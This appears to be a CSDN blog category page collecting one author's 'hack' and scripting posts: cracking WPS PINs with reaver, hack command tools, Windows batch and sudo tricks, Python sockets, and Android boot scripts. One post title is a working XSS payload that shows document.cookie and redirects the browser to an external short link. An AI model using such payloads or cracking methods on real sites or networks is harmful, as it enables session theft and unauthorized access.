![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
hack
文章平均质量分 72
Qidi_Huang
技术是一种信仰,我愿做布道者。
展开
-
一些好用的hack命令工具
【命令工具】-----------------------------------------------------------------------------------------wget, 非交互式互联网资源下载器,支持 HTTP/HTTPS/FTP 等协议。可用于获取提权工具 或其它 hack工具。screen, 远程会话管理工具,可以实现多窗口操作、原创 2016-04-03 10:22:01 · 3391 阅读 · 0 评论 -
使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络
【前言】 现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10...原创 2017-03-19 21:57:48 · 25242 阅读 · 14 评论 -
在cmd命令行下使用wmic永久修改Windows环境变量
【背景说明】 Windows 系统中,有时为了让我们安装的某些软件能正常执行,比如 JavaJDK 或 Git 等,需要向环境变量中添加和软件相关的值;有时我们自己写了一些脚本或小程序,希望能在任意路径下进行调用执行,也需要将这些脚本的所在路径添加到 PATH 环境变量中。我们当然可以在 “系统属性-->高级系统设置-->环境变量” 中使用图形界面进行添加,但这找起来很繁琐,也无原创 2016-09-23 10:22:34 · 12112 阅读 · 0 评论 -
Python 多进程/多线程 学习笔记
【多进程/多线程】 # 多进程和多线程的区别在于,对于同一个变量,多进程是每个进程都有一份自己的拷贝,而多线程则是共享这个变量。 # 多线程使用不当有一定数据风险,应该为此加锁 # 因为 python 解释器带有全局锁 GIL,所以 python 多线程并不能真正实现并发1)新建一个子进程 # python 提供了跨平台多进程模块 multiproces原创 2016-06-06 21:17:58 · 1058 阅读 · 0 评论 -
Python 网络套接字编程
【网络套接字】一、使用 TCP协议1)客户端/Client # 模块 socket 提供了创建网络套接字的函数 # 创建 socket 时需要指明 IP层协议 和 传输层协议 # 使用 socket 进行连接时要以 元组 的形式指明目标的 URL 和 端口号 import socket recBuffer = [] act = socket原创 2016-06-06 19:45:17 · 1063 阅读 · 0 评论 -
xShell终端调用VBS脚本 使用方法说明
【调用方法】 1、先编写 VBS 脚本。比如我们要让 xShell 在目标设备需要确认时自动输入 y ,可以像下面这样编写脚本:Sub main xsh.Screen.Synchronous = True ' 使窗口显示与当前输出同步 xsh.Screen.WaitForString "Reboot now? (y/n)" ' 等待目标设备原创 2016-07-28 16:05:47 · 31506 阅读 · 0 评论 -
Windows下递归搜索文件及其所在目录 .bat脚本实现
【说明】 当我们要查找文件时,在 Linux 下可以使用 find 命令很方便的递归搜索到文件名含有某一关键字的文件及其件所在位置,如 图1 所示。图1 但在 Windows 系统中却并没有这样方便的工具可供我们使用。然而我们经常会有这样的文件查找需求,于是我们可以自己写一个 Windows 下的文件查找脚本。【源码】原创 2016-08-17 16:06:45 · 15941 阅读 · 0 评论 -
在Windows中实现sudo命令——命令行环境中获取管理员权限
【说明】 Windows系统从 Vista 版本开始加入了 UAC 机制,这导致没有足够权限的程序无法获取到一些关键资源。在 Linux 下我们可以使用 sudo 命令方便地提升当前程序的执行权限,但在 Windows 中却通常只能右键单击程序图标,再选择 “以管理员身份运行”。这种必须使用鼠标点击的方式很不方便,尤其在我们希望自动化执行一些任务时更是显得碍手碍脚。原创 2016-08-18 17:34:20 · 49096 阅读 · 17 评论 -
<script>alert('xss1');alert(document.cookie);self.location="http://dwz.cn/3SVr3s"</script>
<script>alert(5)</script>原创 2016-07-21 15:07:26 · 1715 阅读 · 0 评论 -
正则表达式 语法
内容节选自博客 AstralWind:原创 2016-06-13 13:40:01 · 722 阅读 · 0 评论 -
批处理之 正确使用for语句 以及!errorlevel!、%errorlevel% 与 DelayedExpansion用法详解
昨天在使用批处理中的 for 语句的时候,最初我采用下面这种写法:@echo offset ip=192.168.1for /l %%i in (1,1,5) do ( set ip=%ip%.%%i :: 遍历 IP 池 echo ip=%ip% i=%%i)图1 运行结果如上图,显示变量 ip 的值始终为 192.168.1,并原创 2016-05-20 20:55:15 · 5687 阅读 · 0 评论 -
获取管理员权限的粗糙思路
过完年了,挺长时间没有更新博客来着。刚才看到条消息说 glibc 中的 getaddrinfo() 函数包含了一个缓冲区溢出bug,允许攻击者远程执行恶意代码。漏洞可以在通过设备或应用查询被攻击者控制的域名或DNS服务器时被利用。glibc维护者已经发布了修正,但很多包含该漏洞的应用或设备未必能及时打上补丁。有思于此,加上前段时间在看李承远写的《逆向工程核心原理》,虽然目前的我对于如何黑进原创 2016-02-17 22:58:56 · 826 阅读 · 0 评论 -
为 Android 8.0 添加开机启动脚本
为 Android 8.0 添加开机启动脚本Qidi 2018.01.11 (Markdown & Haroopad)【写在前面】 本人对于 SELinux for Android 理解不深,下文中的各文件及安全规则虽都是我所编写,但也是一边查阅文档一边试验得出的。在此强行为文,若有理解错误之处,请各位工程师同仁热情指出。一、需求描述 项目上需要在 Andr原创 2018-01-12 10:25:42 · 14758 阅读 · 14 评论